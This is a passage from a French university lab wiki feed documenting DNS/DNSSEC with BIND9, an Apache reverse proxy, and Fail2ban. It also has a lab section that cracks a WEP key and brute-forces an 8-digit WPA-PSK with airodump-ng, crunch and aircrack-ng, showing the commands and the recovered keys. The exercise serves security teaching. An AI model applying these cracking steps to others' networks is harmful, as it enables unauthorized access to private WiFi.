Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12336</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12336"/>
		<updated>2026-02-22T15:08:10Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Paramètrage sur machine mandataire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
